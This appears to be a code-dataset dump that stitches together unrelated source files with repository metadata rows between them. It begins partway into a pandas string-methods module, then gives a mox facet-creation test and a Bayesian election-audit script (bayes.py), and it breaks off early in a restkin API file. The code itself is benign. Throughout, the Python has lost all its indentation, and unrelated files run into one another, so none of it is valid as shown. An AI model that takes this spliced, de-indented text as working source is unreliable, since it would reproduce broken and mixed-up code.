Series.str.rstrip : Remove trailing characters in Series/Index.
Examples
--------
>>> s = pd.Series(['1. Ant. ', '2. Bee!\n', '3. Cat?\t', np.nan])
>>> s
0 1. Ant.
1 2. Bee!\n
2 3. Cat?\t
3 NaN
dtype: object
>>> s.str.strip()
0 1. Ant.
1 2. Bee!
2 3. Cat?
3 NaN
dtype: object
>>> s.str.lstrip('123.')
0 Ant.
1 Bee!\n
2 Cat?\t
3 NaN
dtype: object
>>> s.str.rstrip('.!? \n\t')
0 1. Ant
1 2. Bee
2 3. Cat
3 NaN
dtype: object
>>> s.str.strip('123.!? \n\t')
0 Ant
1 Bee
2 Cat
3 NaN
dtype: object
"""
@Appender(
_shared_docs["str_strip"] % dict(side="left and right sides", method="strip")
)
@forbid_nonstring_types(["bytes"])
def strip(self, to_strip=None):
result = str_strip(self._parent, to_strip, side="both")
return self._wrap_result(result)
@Appender(_shared_docs["str_strip"] % dict(side="left side", method="lstrip"))
@forbid_nonstring_types(["bytes"])
def lstrip(self, to_strip=None):
result = str_strip(self._parent, to_strip, side="left")
return self._wrap_result(result)
@Appender(_shared_docs["str_strip"] % dict(side="right side", method="rstrip"))
@forbid_nonstring_types(["bytes"])
def rstrip(self, to_strip=None):
result = str_strip(self._parent, to_strip, side="right")
return self._wrap_result(result)
@copy(str_wrap)
@forbid_nonstring_types(["bytes"])
def wrap(self, width, **kwargs):
result = str_wrap(self._parent, width, **kwargs)
return self._wrap_result(result)
@copy(str_get_dummies)
@forbid_nonstring_types(["bytes"])
def get_dummies(self, sep="|"):
# we need to cast to Series of strings as only that has all
# methods available for making the dummies...
data = self._orig.astype(str) if self._is_categorical else self._parent
result, name = str_get_dummies(data, sep)
return self._wrap_result(
result, use_codes=(not self._is_categorical), name=name, expand=True
)
@copy(str_translate)
@forbid_nonstring_types(["bytes"])
def translate(self, table):
result = str_translate(self._parent, table)
return self._wrap_result(result)
count = _pat_wrapper(str_count, flags=True, name="count")
startswith = _pat_wrapper(str_startswith, na=True, name="startswith")
endswith = _pat_wrapper(str_endswith, na=True, name="endswith")
findall = _pat_wrapper(str_findall, flags=True, name="findall")
@copy(str_extract)
@forbid_nonstring_types(["bytes"])
def extract(self, pat, flags=0, expand=True):
return str_extract(self, pat, flags=flags, expand=expand)
@copy(str_extractall)
@forbid_nonstring_types(["bytes"])
def extractall(self, pat, flags=0):
return str_extractall(self._orig, pat, flags=flags)
_shared_docs[
"find"
] = """
Return %(side)s indexes in each strings in the Series/Index
where the substring is fully contained between [start:end].
Return -1 on failure. Equivalent to standard :meth:`str.%(method)s`.
Parameters
----------
sub : str
Substring being searched
start : int
Left edge index
end : int
Right edge index
Returns
-------
found : Series/Index of integer values
See Also
--------
%(also)s
"""
@Appender(
_shared_docs["find"]
% dict(
side="lowest",
method="find",
also="rfind : Return highest indexes in each strings.",
)
)
@forbid_nonstring_types(["bytes"])
def find(self, sub, start=0, end=None):
result = str_find(self._parent, sub, start=start, end=end, side="left")
return self._wrap_result(result)
@Appender(
_shared_docs["find"]
% dict(
side="highest",
method="rfind",
also="find : Return lowest indexes in each strings.",
)
)
@forbid_nonstring_types(["bytes"])
def rfind(self, sub, start=0, end=None):
result = str_find(self._parent, sub, start=start, end=end, side="right")
return self._wrap_result(result)
@forbid_nonstring_types(["bytes"])
def normalize(self, form):
"""
Return the Unicode normal form for the strings in the Series/Index.
For more information on the forms, see the
:func:`unicodedata.normalize`.
Parameters
----------
form : {'NFC', 'NFKC', 'NFD', 'NFKD'}
Unicode form
Returns
-------
normalized : Series/Index of objects
"""
import unicodedata
f = lambda x: unicodedata.normalize(form, x)
result = _na_map(f, self._parent)
return self._wrap_result(result)
_shared_docs[
"index"
] = """
Return %(side)s indexes in each strings where the substring is
fully contained between [start:end]. This is the same as
``str.%(similar)s`` except instead of returning -1, it raises a ValueError
when the substring is not found. Equivalent to standard ``str.%(method)s``.
Parameters
----------
sub : str
Substring being searched
start : int
Left edge index
end : int
Right edge index
Returns
-------
found : Series/Index of objects
See Also
--------
%(also)s
"""
@Appender(
_shared_docs["index"]
% dict(
side="lowest",
similar="find",
method="index",
also="rindex : Return highest indexes in each strings.",
)
)
@forbid_nonstring_types(["bytes"])
def index(self, sub, start=0, end=None):
result = str_index(self._parent, sub, start=start, end=end, side="left")
return self._wrap_result(result)
@Appender(
_shared_docs["index"]
% dict(
side="highest",
similar="rfind",
method="rindex",
also="index : Return lowest indexes in each strings.",
)
)
@forbid_nonstring_types(["bytes"])
def rindex(self, sub, start=0, end=None):
result = str_index(self._parent, sub, start=start, end=end, side="right")
return self._wrap_result(result)
_shared_docs[
"len"
] = """
Compute the length of each element in the Series/Index. The element may be
a sequence (such as a string, tuple or list) or a collection
(such as a dictionary).
Returns
-------
Series or Index of int
A Series or Index of integer values indicating the length of each
element in the Series or Index.
See Also
--------
str.len : Python built-in function returning the length of an object.
Series.size : Returns the length of the Series.
Examples
--------
Returns the length (number of characters) in a string. Returns the
number of entries for dictionaries, lists or tuples.
>>> s = pd.Series(['dog',
... '',
... 5,
... {'foo' : 'bar'},
... [2, 3, 5, 7],
... ('one', 'two', 'three')])
>>> s
0 dog
1
2 5
3 {'foo': 'bar'}
4 [2, 3, 5, 7]
5 (one, two, three)
dtype: object
>>> s.str.len()
0 3.0
1 0.0
2 NaN
3 1.0
4 4.0
5 3.0
dtype: float64
"""
len = _noarg_wrapper(
len, docstring=_shared_docs["len"], forbidden_types=None, dtype=int
)
_shared_docs[
"casemethods"
] = """
Convert strings in the Series/Index to %(type)s.
%(version)s
Equivalent to :meth:`str.%(method)s`.
Returns
-------
Series/Index of objects
See Also
--------
Series.str.lower : Converts all characters to lowercase.
Series.str.upper : Converts all characters to uppercase.
Series.str.title : Converts first character of each word to uppercase and
remaining to lowercase.
Series.str.capitalize : Converts first character to uppercase and
remaining to lowercase.
Series.str.swapcase : Converts uppercase to lowercase and lowercase to
uppercase.
Series.str.casefold: Removes all case distinctions in the string.
Examples
--------
>>> s = pd.Series(['lower', 'CAPITALS', 'this is a sentence', 'SwApCaSe'])
>>> s
0 lower
1 CAPITALS
2 this is a sentence
3 SwApCaSe
dtype: object
>>> s.str.lower()
0 lower
1 capitals
2 this is a sentence
3 swapcase
dtype: object
>>> s.str.upper()
0 LOWER
1 CAPITALS
2 THIS IS A SENTENCE
3 SWAPCASE
dtype: object
>>> s.str.title()
0 Lower
1 Capitals
2 This Is A Sentence
3 Swapcase
dtype: object
>>> s.str.capitalize()
0 Lower
1 Capitals
2 This is a sentence
3 Swapcase
dtype: object
>>> s.str.swapcase()
0 LOWER
1 capitals
2 THIS IS A SENTENCE
3 sWaPcAsE
dtype: object
"""
# _doc_args holds dict of strings to use in substituting casemethod docs
_doc_args = {} # type: Dict[str, Dict[str, str]]
_doc_args["lower"] = dict(type="lowercase", method="lower", version="")
_doc_args["upper"] = dict(type="uppercase", method="upper", version="")
_doc_args["title"] = dict(type="titlecase", method="title", version="")
_doc_args["capitalize"] = dict(
type="be capitalized", method="capitalize", version=""
)
_doc_args["swapcase"] = dict(type="be swapcased", method="swapcase", version="")
_doc_args["casefold"] = dict(
type="be casefolded",
method="casefold",
version="\n .. versionadded:: 0.25.0\n",
)
lower = _noarg_wrapper(
lambda x: x.lower(),
name="lower",
docstring=_shared_docs["casemethods"] % _doc_args["lower"],
)
upper = _noarg_wrapper(
lambda x: x.upper(),
name="upper",
docstring=_shared_docs["casemethods"] % _doc_args["upper"],
)
title = _noarg_wrapper(
lambda x: x.title(),
name="title",
docstring=_shared_docs["casemethods"] % _doc_args["title"],
)
capitalize = _noarg_wrapper(
lambda x: x.capitalize(),
name="capitalize",
docstring=_shared_docs["casemethods"] % _doc_args["capitalize"],
)
swapcase = _noarg_wrapper(
lambda x: x.swapcase(),
name="swapcase",
docstring=_shared_docs["casemethods"] % _doc_args["swapcase"],
)
casefold = _noarg_wrapper(
lambda x: x.casefold(),
name="casefold",
docstring=_shared_docs["casemethods"] % _doc_args["casefold"],
)
_shared_docs[
"ismethods"
] = """
Check whether all characters in each string are %(type)s.
This is equivalent to running the Python string method
:meth:`str.%(method)s` for each element of the Series/Index. If a string
has zero characters, ``False`` is returned for that check.
Returns
-------
Series or Index of bool
Series or Index of boolean values with the same length as the original
Series/Index.
See Also
--------
Series.str.isalpha : Check whether all characters are alphabetic.
Series.str.isnumeric : Check whether all characters are numeric.
Series.str.isalnum : Check whether all characters are alphanumeric.
Series.str.isdigit : Check whether all characters are digits.
Series.str.isdecimal : Check whether all characters are decimal.
Series.str.isspace : Check whether all characters are whitespace.
Series.str.islower : Check whether all characters are lowercase.
Series.str.isupper : Check whether all characters are uppercase.
Series.str.istitle : Check whether all characters are titlecase.
Examples
--------
**Checks for Alphabetic and Numeric Characters**
>>> s1 = pd.Series(['one', 'one1', '1', ''])
>>> s1.str.isalpha()
0 True
1 False
2 False
3 False
dtype: bool
>>> s1.str.isnumeric()
0 False
1 False
2 True
3 False
dtype: bool
>>> s1.str.isalnum()
0 True
1 True
2 True
3 False
dtype: bool
Note that checks against characters mixed with any additional punctuation
or whitespace will evaluate to false for an alphanumeric check.
>>> s2 = pd.Series(['A B', '1.5', '3,000'])
>>> s2.str.isalnum()
0 False
1 False
2 False
dtype: bool
**More Detailed Checks for Numeric Characters**
There are several different but overlapping sets of numeric characters that
can be checked for.
>>> s3 = pd.Series(['23', '³', '⅕', ''])
The ``s3.str.isdecimal`` method checks for characters used to form numbers
in base 10.
>>> s3.str.isdecimal()
0 True
1 False
2 False
3 False
dtype: bool
The ``s.str.isdigit`` method is the same as ``s3.str.isdecimal`` but also
includes special digits, like superscripted and subscripted digits in
unicode.
>>> s3.str.isdigit()
0 True
1 True
2 False
3 False
dtype: bool
The ``s.str.isnumeric`` method is the same as ``s3.str.isdigit`` but also
includes other characters that can represent quantities such as unicode
fractions.
>>> s3.str.isnumeric()
0 True
1 True
2 True
3 False
dtype: bool
**Checks for Whitespace**
>>> s4 = pd.Series([' ', '\\t\\r\\n ', ''])
>>> s4.str.isspace()
0 True
1 True
2 False
dtype: bool
**Checks for Character Case**
>>> s5 = pd.Series(['leopard', 'Golden Eagle', 'SNAKE', ''])
>>> s5.str.islower()
0 True
1 False
2 False
3 False
dtype: bool
>>> s5.str.isupper()
0 False
1 False
2 True
3 False
dtype: bool
The ``s5.str.istitle`` method checks for whether all words are in title
case (whether only the first letter of each word is capitalized). Words are
assumed to be as any sequence of non-numeric characters separated by
whitespace characters.
>>> s5.str.istitle()
0 False
1 True
2 False
3 False
dtype: bool
"""
_doc_args["isalnum"] = dict(type="alphanumeric", method="isalnum")
_doc_args["isalpha"] = dict(type="alphabetic", method="isalpha")
_doc_args["isdigit"] = dict(type="digits", method="isdigit")
_doc_args["isspace"] = dict(type="whitespace", method="isspace")
_doc_args["islower"] = dict(type="lowercase", method="islower")
_doc_args["isupper"] = dict(type="uppercase", method="isupper")
_doc_args["istitle"] = dict(type="titlecase", method="istitle")
_doc_args["isnumeric"] = dict(type="numeric", method="isnumeric")
_doc_args["isdecimal"] = dict(type="decimal", method="isdecimal")
isalnum = _noarg_wrapper(
lambda x: x.isalnum(),
name="isalnum",
docstring=_shared_docs["ismethods"] % _doc_args["isalnum"],
)
isalpha = _noarg_wrapper(
lambda x: x.isalpha(),
name="isalpha",
docstring=_shared_docs["ismethods"] % _doc_args["isalpha"],
)
isdigit = _noarg_wrapper(
lambda x: x.isdigit(),
name="isdigit",
docstring=_shared_docs["ismethods"] % _doc_args["isdigit"],
)
isspace = _noarg_wrapper(
lambda x: x.isspace(),
name="isspace",
docstring=_shared_docs["ismethods"] % _doc_args["isspace"],
)
islower = _noarg_wrapper(
lambda x: x.islower(),
name="islower",
docstring=_shared_docs["ismethods"] % _doc_args["islower"],
)
isupper = _noarg_wrapper(
lambda x: x.isupper(),
name="isupper",
docstring=_shared_docs["ismethods"] % _doc_args["isupper"],
)
istitle = _noarg_wrapper(
lambda x: x.istitle(),
name="istitle",
docstring=_shared_docs["ismethods"] % _doc_args["istitle"],
)
isnumeric = _noarg_wrapper(
lambda x: x.isnumeric(),
name="isnumeric",
docstring=_shared_docs["ismethods"] % _doc_args["isnumeric"],
)
isdecimal = _noarg_wrapper(
lambda x: x.isdecimal(),
name="isdecimal",
docstring=_shared_docs["ismethods"] % _doc_args["isdecimal"],
)
@classmethod
def _make_accessor(cls, data):
cls._validate(data)
return cls(data)
| apache-2.0 | -8,466,611,931,052,144,000 | 29.541679 | 88 | 0.565437 | false |
magenta-aps/mox | oio_rest/tests/test_integration_create_facet.py | 1 | 1390 | #
# Copyright (c) 2017-2018, Magenta ApS
#
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
#
from tests.test_integration_create_helper import TestCreateObject
class TestCreateFacet(TestCreateObject):
def setUp(self):
super(TestCreateFacet, self).setUp()
def test_create_facet(self):
facet = {
"attributter": {
"facetegenskaber": [
{
"brugervendtnoegle": "bvn",
"integrationsdata": "data fra andet system",
"virkning": self.standard_virkning1
}
]
},
"tilstande": {
"facetpubliceret": [
{
"publiceret": "Publiceret",
"virkning": self.standard_virkning1
}
]
}
}
r = self.perform_request('/klassifikation/facet', json=facet)
# Check response
self.assert201(r)
# Check persisted data
facet['livscykluskode'] = 'Opstaaet'
self.assertQueryResponse(
'/klassifikation/facet',
facet,
uuid=r.json['uuid']
)
| mpl-2.0 | -8,037,694,351,018,209,000 | 27.958333 | 69 | 0.500719 | false |
ron-rivest/2017-bayes-audit | from-2012-bayes-audit/bayes.py | 1 | 21492 | # bayes.py
# Code for working with Bayes Post-Election Audits
# Ronald L. Rivest and Emily Shen
# 5/31/12
"""
----------------------------------------------------------------------
This code available under "MIT License" (open source).
Copyright (C) 2012 Ronald L. Rivest and Emily Shen.
Permission is hereby granted, free of charge, to any person obtaining
a copy of this software and associated documentation files (the
"Software"), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish,
distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to
the following conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
----------------------------------------------------------------------
"""
"""
Notation:
Even though Python is 0-indexed, we'll use one-indexing here, to
correspond better with our paper. The 0-th element of lists (arrays)
will be ignored (and is typically set to a dummy(-9)).
m -- the number of candidates (for plurality elections)
t -- the number of distinct ballot types possible resulting from
a machine scan or hand examination of a ballot.
One may consider "undervote" and "overvote" to be
ballot types (although they shouldn't win), in
which case we havve t = m+2 for a plurality election.
The ballot types are coded as integers: 1, ..., t.
n -- the number of ballots cast.
r[1..n] -- the list of all the *reported* ballot types.
This is the "reported profile" for the election.
That is, r[i] is the ``machine result'' for ballot i.
a[1..n] -- the list of all the corresponding *actual* ballot types.
This is the "actual profile" for the election.
That is, a[i] is the ``hand audit result'' for ballot i.
In practice, these become known only one at a time,
as audited, instead of all at once, as coded here.
s -- the size of the current sample (the number of ballots
audited so far).
epsilon -- the provided ``upset risk limit'' (e.g. 0.05)
"""
######################################################################
# Reminder: this code runs about 7x faster with "pypy" than with
# the standard python interpreter ! Use pypy!
######################################################################
import math
import random
import string
import time
dummy = -9 # dummy value for array position 0
######################################################################
# TALLY
######################################################################
def tally(P,t):
"""
Return list of counts of each ballot type in profile P.
Assumes each entry of P[1:] is in 1...t, inclusive.
P is 0-indexed; dummy value P[0] is ignored.
returned count[j] is number of votes of type j, 1<=j<=t.
returned count[0] is a dummy value.
"""
count = [dummy]+[0]*t
for i in range(1,len(P)):
count[P[i]] += 1
return count
######################################################################
# SOCIAL CHOICE FUNCTION
######################################################################
"""
The social choice function that returns an election outcome for a
given profile with the tally results that are given in count[1..t].
The election outcome is typically an integer
(e.g. the most common ballot type), but can be any arbitrary
Python object that can be compared for equality.
There are many ways this routine could be coded, depending on the
choice of voting system; any (deterministic) voting system could
be used.
For our purposes, it is important that the social choice function f be
well-defined even for non-integer counts, since our Dirichlet
approximations will give non-integral values. This is OK, since
almost all voting systems are based on comparing vote totals of
various sorts, and integrality of vote totals is not required.
In practice, one may want to disallow "undervote" and "overvote" from
winning, if they are ballot types. This may be accomplished by
supplying an extra (optional) argument to f, a dictionary that
supplies additional parameters and information to f (in a way
that may depend on f, of course). See the example for plurality
below.
"""
def f_plurality(count,params=None):
"""
A simple example social choice function -- plurality elections.
Here we assume that the most common ballot type "wins", with
ties broken in favor of the lower-numbered outcome.
If params is supplied to f_plurality, it should be a dict such that
params['invalid'] is a list of outcomes that are not be allowed to win.
For example, f(count,{'invalid':[1]}) will not allow outcome 1.
You can use closures to get the desired binding of params in
social choice function, e.g.
g = lambda count: f_plurality(count,{'invalid',[1]})
defines social choice function g that embeds the desired params
into f_plurality; g only takes count as an argument (the params
are now implicit).
"""
t = len(count)-1
if params != None:
invalid_list = params.get('invalid',[])
else:
invalid_list = []
outcome = 1
while outcome < t and outcome in invalid_list:
outcome += 1
for j in xrange(outcome+1,t+1):
if count[j]>count[outcome] and outcome not in invalid_list:
outcome = j
return outcome
def test_f_plurality():
"""
Simple test routine for social choice function f_plurality.
"""
P = [dummy]+[1, 1, 2, 0, 3, 1, 2]
t = 3
print "profile", P[1:]
count = tally(P,t)
print "outcome = ", f_plurality(count)
# ==> 1
P = [dummy]+[1, 2, 1, 2, 3, 4, 6]
print P[1:]
t = 6
count = tally(P,t)
print "outcome = ", f_plurality(count,{'invalid':[1]})
# ==> 2
# test_f_plurality()
######################################################################
# MAKE LIST OF HYPERPARAMETER MATRICES OR VECTORS
######################################################################
def make_prior_list(audit_type,t,ballot_polling):
"""
return list of t x t prior matrices if comparison audit
return list of t prior vectors if ballot-polling audit
audit_type is one of (where c is an integer):
"N" -- non partisan (uniform) all hyperparameters = 1 (same as N1)
"Nc" -- non partisan (uniform) all hyperparameters = c
"P" -- partisan: list of t matrices each all zeros except one column = to 1 (same as P1)
"Pc" -- partisan: list of t matrices each all zeros except one column = to c
"NP" -- N union P
"NPc" -- Nc union Pc
Each matrix is t x t with integer entries (with dummy entries to account for 0-indexing of lists).
"""
prior_list = [ ]
c_digits = [ d for d in audit_type if d in string.digits ]
if c_digits != [ ] :
c = int(string.join(c_digits,sep=""))
else:
c = 1
if not ballot_polling:
if "N" in audit_type:
prior_list += [ [dummy] +
[ [dummy]+[c]*t for j in xrange(1,t+1) ] # just one matrix, c's everywhere
]
if "P" in audit_type:
prior_list += [ [dummy] + [ [dummy]+[0]*(k-1) + [c] + [0]*(t-k) for j in xrange(1,t+1) ] # one for each type k
for k in xrange(1,t+1)
]
else: # ballot polling
if "N" in audit_type:
prior_list += [ [dummy] + [c]*t ] # just one vector of all c's
if "P" in audit_type:
prior_list += [ [dummy]+[0]*(k-1) + [c] + [0]*(t-k) # one for each type k
for k in xrange(1,t+1)
]
return prior_list
# print make_prior_list("N2",3,True)
# --> [[-9, 2, 2, 2]]
# print make_prior_list("P2",3,True)
# --> [[-9, 2, 0, 0], [-9, 0, 2, 0], [-9, 0, 0, 2]]
# print make_prior_list("N2",3,False)
# --> [ [-9, [-9, 2, 2, 2], [-9, 2, 2, 2], [-9, 2, 2, 2]] ]
# print make_prior_list("P2",3,False)
# --> [ [-9, [-9, 2, 0, 0], [-9, 2, 0, 0], [-9, 2, 0, 0]],
# [-9, [-9, 0, 2, 0], [-9, 0, 2, 0], [-9, 0, 2, 0]],
# [-9, [-9, 0, 0, 2], [-9, 0, 0, 2], [-9, 0, 0, 2]]]
######################################################################
# MAKE AUDITING SCHEDULE
######################################################################
def make_schedule(n,pattern):
"""
Make up an auditing schedule (a list of sample size s values to use)
start with 0
do pattern, then pattern repeated by multipied by last/first, etc.
end with n
note that last/first does not need to be an integer.
make_schedule(1000,[1,2]) # --> 0,1,2,4,8,16,32,64,128,256,512,1000
make_schedule(1000,[1,2,5,10]) # --> 0,1,2,5,10,20,50,100,200,500,1000
make_schedule(1000,[5,6]) # --> 0,5,6,7,8,10,12,14,17,21,25,30,37,44,53,64,77,...
"""
schedule = [ 0 ]
multiplier = 1
next_s = 1
while schedule[-1] < n:
for x in pattern:
next_s = int(x*multiplier)
next_s = min(n,next_s)
if next_s > schedule[-1]:
schedule.append(next_s)
multiplier *= float(pattern[-1])/float(pattern[0])
return schedule
######################################################################
# AUDIT (top-level dispatch function)
######################################################################
audit_method = "dirichlet" # switch to control dispatch
# alternative is "polya"
def audit(r,a,t,epsilon,schedule,printing_wanted=True,ballot_polling=False,f=f_plurality,audit_type="N"):
"""
Audit the election, given reported ballot types (r), actual
ballot types (a), and an upset probability limit (epsilon).
Each ballot type should be an integer in the range 1 to t (incl.)
ballot_polling=True if we want a ballot-polling audit.
f is the social choice function (defaults to plurality among ballot types)
Assumes the ballots already in some "random order"
r[0] and a[0] are ignored; only r[1..n] and a[1..n] are considered.
t = number of ballot types possible (numbered 1...t, inclusive)
audit_type is one of (where c is an integer) (default is "N"):
"N" -- non partisan (uniform) all hyperparameters = 1 (same as N1)
"Nc" -- non partisan (uniform) all hyperparameters = c
"P" -- partisan: list of t matrices each all zeros except one column = to 1 (same as P1)
"Pc" -- partisan: list of t matrices each all zeros except one column = to c
"NP" -- N union P
"NPc" -- Nc union Pc
The audit stops when upset probability is at most epsilon for *all* priors in list.
returns (result, s)
where result=="OK" if the reported outcome seems OK, else result=="NOT OK"
and where s == number of ballots examined.
"""
n = len(r)-1 # number of ballots in r
assert len(r) == len(a) # should have the same length
assert min(r[1:]) >= 1
assert max(r[1:]) <= t
assert min(a[1:]) >= 1
assert max(a[1:]) <= t
if audit_method == "dirichlet":
return audit_dirichlet(r,a,t,epsilon,schedule,printing_wanted,ballot_polling,f,audit_type)
elif audit_method == "polya":
import polya
return polya.audit_polya(r,a,t,epsilon,schedule,printing_wanted,ballot_polling,f,audit_type)
else:
print "In audit(): illegal audit_method specification:",audit_method
quit()
######################################################################
# DIRICHLET DISTRIBUTION
######################################################################
def dirichlet(alphas,n):
"""
Sample from a Dirichlet distribution.
return n times a Dirichlet random variable generated according to the given alphas.
note that alphas[0] is dummy to be ignored.
ignores alphas that are 0 (i.e. generates a zero component here)
returns vector x of same length as alphas
"""
# print "alphas",alphas
t = len(alphas)-1
x = [dummy] + [0.0]*t
sumx = 0.0
for k in xrange(1,t+1):
if alphas[k]>0.0:
x[k] = random.gammavariate(alphas[k],1)
sumx += x[k]
assert sumx > 0.0
for k in xrange(1,t+1):
x[k] = n * x[k] / sumx
return x
######################################################################
# AUDIT USING DIRICHLET DISTRIBUTION
######################################################################
def audit_dirichlet(r,a,t,epsilon,schedule,printing_wanted=True,ballot_polling=False,f=f_plurality,audit_type="N"):
"""
Audit the election, given reported ballot types (r), actual
ballot types (a), and an upset probability limit (epsilon)
Each ballot type should be an integer in the range 1 to t (incl.)
Assumes the ballots already in some "random order"
r[0] and a[0] are ignored; only r[1..n] and a[1..n] are considered.
t = number of ballot types possible (numbered 1...t, inclusive)
ballot_polling=True if we want a ballot_polling audit (then r is ignored)
f is the social choice function (defaults to plurality among ballot types)
audit_type is one of (where c is an integer):
"N" -- non partisan (uniform) all hyperparameters = 1 (same as N1)
"Nc" -- non partisan (uniform) all hyperparameters = c
"P" -- partisan: list of t matrices each all zeros except one column = to 1 (same as P1)
"Pc" -- partisan: list of t matrices each all zeros except one column = to c
"NP" -- N union P
"NPc" -- Nc union Pc
returns ("OK",s) if the reported outcome seems OK
Otherwise it returns ("NOT OK",s)
where s is the number of ballots examined.
"""
n = len(r)-1 # number of ballots in r
assert len(r) == len(a) # should have the same length
assert min(r[1:]) >= 1
assert max(r[1:]) <= t
assert min(a[1:]) >= 1
assert max(a[1:]) <= t
R = tally(r,t)
reported_outcome = f(R)
A = tally(a,t)
actual_outcome = f(A)
prior_list = make_prior_list(audit_type,t,ballot_polling)
if printing_wanted:
print "%8d = number of ballot types"%t
print "%8d = number of total ballots"%n
print "%8.4f = epsilon (upset probabilitylimit)"%epsilon
print "audit_type = ",audit_type
print "%8d = number of priors"%len(prior_list)
for x in R[1:]:
print "%8d "%x,
print "= counts of reported ballots (reported outcome is %4d )"%reported_outcome
for x in A[1:]:
print "%8d "%x,
print "= counts of actual ballots (actual outcome is %4d )"%actual_outcome
print "Ballot-polling audit:",ballot_polling
# main loop -- do samples of given sizes from schedule
s = 0
# initialize counts to zero
if not ballot_polling:
count = [dummy] + [ [dummy]+[0]*t for j in xrange(1,t+1) ] # allocate this only once
else: # ballot-polling
count = [dummy]+[0]*t # allocate this only once
for next_s in schedule:
# audit enough ballots so that s = next_s
while s < next_s:
s = s + 1
# In practice you'd be looking at a paper ballot in the next line;
# in this code, we assume actual ballot types already available in array a.
pass # <-- audit ballot number s here; that is, determine a[s]
if not ballot_polling:
count[r[s]][a[s]] += 1
else:
count[a[s]] += 1
# now number of ballots audited is s
max_upset_prob = -1.0
for prior in prior_list:
# Determine probability of each outcome (dictionary "wins")
# Determine u the probability of an election upset
# Determine z the number of simulated profiles examined within upset_prob_dirichlet routine
wins,u,z = win_probs(r,a,t,s,n,count,ballot_polling,f,prior)
if printing_wanted:
print "After %6d ballots audited, probability of an upset is %7.4f"%(s,u),"(z = %4d simulated profiles)"%z,
print "(winning probabilities are:",wins,")"
max_upset_prob = max(u,max_upset_prob)
breakout = True
if breakout and max_upset_prob > epsilon: # don't bother with other priors
break
# decide to quit if max_upset prob is at most epsilon
if max_upset_prob<=epsilon:
if printing_wanted:
print "Reported election outcome is OK (%d ballots audited)"%s
# print "count:",count
return ("OK",s)
else:
if printing_wanted:
print "Reported election outcome was NOT OK !!! (All %d ballots audited)"%n
return ("NOT OK",s)
def win_probs(r,a,t,s,n,count,ballot_polling=False,f=f_plurality,prior=None):
"""
Use simulation to determine the probability of each outcome.
s is sample size (so far), 0 <= s <= n
for comparison audit:
count[j][k] is number of ballots of reported type j and actual type k (plus hyperparameter prior[j][k]) in ballots 1..s
for ballot-polling audit
count[k] is number of ballots of actual type k (plus hyperparameter prior[k]) in ballots 1..s
ballot_polling is True iff we want a ballot-polling audit
f is social choice function
return dictionary mapping outcomes to frequency of winning, upset probability, and max_trials
"""
R = tally(r,t) # tally of reported votes
if not ballot_polling: # only have reported votes if not ballot polling
reported_outcome = f(R)
max_trials = 10000 # determines accuracy of u (upset probability)
upsets = 0
B = [dummy] + [0]*t # allocate this only once (tally for simulated profile)
alphas = [dummy] + [0]*t # allocate only once (alphas for Dirichlet)
wins = dict() # keep track of number of wins for each outcome
for j in xrange(1,t+1):
wins[j] = 0
if not ballot_polling: # comparison audit
Rrem = [dummy] + [0]*t # Rrem[j] is number remaining unaudited of reported type j
for j in xrange(1,t+1):
Rrem[j] = R[j] # number remaining unaudited of reported type j
for j in xrange(1,t+1):
for k in xrange(1,t+1):
Rrem[j] -= count[j][k]
for z in xrange(1,max_trials+1):
for k in xrange(1,t+1):
B[k] = 0 # initialize tally for profile b to zero.
for j in xrange(1,t+1): # add in actual counts for ballots audited so far
for k in xrange(1,t+1):
B[k] += count[j][k]
for j in xrange(1,t+1): # for each reported type
for k in xrange(1,t+1):
alphas[k] = prior[j][k] + count[j][k]
ds = dirichlet(alphas,Rrem[j]) # note: Rrem[j] is remaining size of profile of reported type j after sample
for k in xrange(1,t+1):
B[k] += ds[k] # add to counts for sample
new_outcome = f(B)
wins[new_outcome] = wins.get(new_outcome,0)+1
if new_outcome != reported_outcome:
upsets += 1
else: # ballot-polling audit
for k in xrange(1,t+1):
alphas[k] = prior[k] + count[k]
for z in xrange(1,max_trials+1):
ds = dirichlet(alphas,n-s) # n-s = number of unaudited ballots
for k in xrange(1,t+1):
ds[k] += count[k] # add counts to dirichlet for simulated ballot tally
new_outcome = f(ds)
wins[new_outcome] = wins.get(new_outcome,0)+1
# for ballot-polling audit, "upset prob" is 1 - max winning prob
upsets = max_trials - max(wins.values())
for outcome in wins.keys():
wins[outcome] = float(wins[outcome])/float(max_trials)
u = float(upsets) / float(max_trials)
return wins,u,max_trials
| mit | -1,709,334,529,340,910,800 | 42.330645 | 127 | 0.553136 | false |
zhaoxuan/baidu_restkin | restkin/api.py | 1 | 4948 | # Copyright 2012 Rackspace Hosting, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import pdb
from twisted.web import http
from twisted.python import log
from twisted.web.resource import Resource, NoResource
from tryfer.trace import Trace, Annotation, Endpoint
from restkin.utils import decode_hex_number
class RProxyWrapper(Resource):
rp_error_to_http_code = {
'NR-1000': http.UNAUTHORIZED,
'NR-1001': http.UNAUTHORIZED,
'NR-1002': http.UNAUTHORIZED,
'NR-5000': http.INTERNAL_SERVER_ERROR,
'NR-2000': 429 # httpbis - To Many Requests
}
def __init__(self, wrapped):
Resource.__init__(self)
self._wrapped = wrapped
def render(self, request):
headers = request.requestHeaders
rp_error_code = headers.getRawHeaders('X-RP-Error-Code')[0]
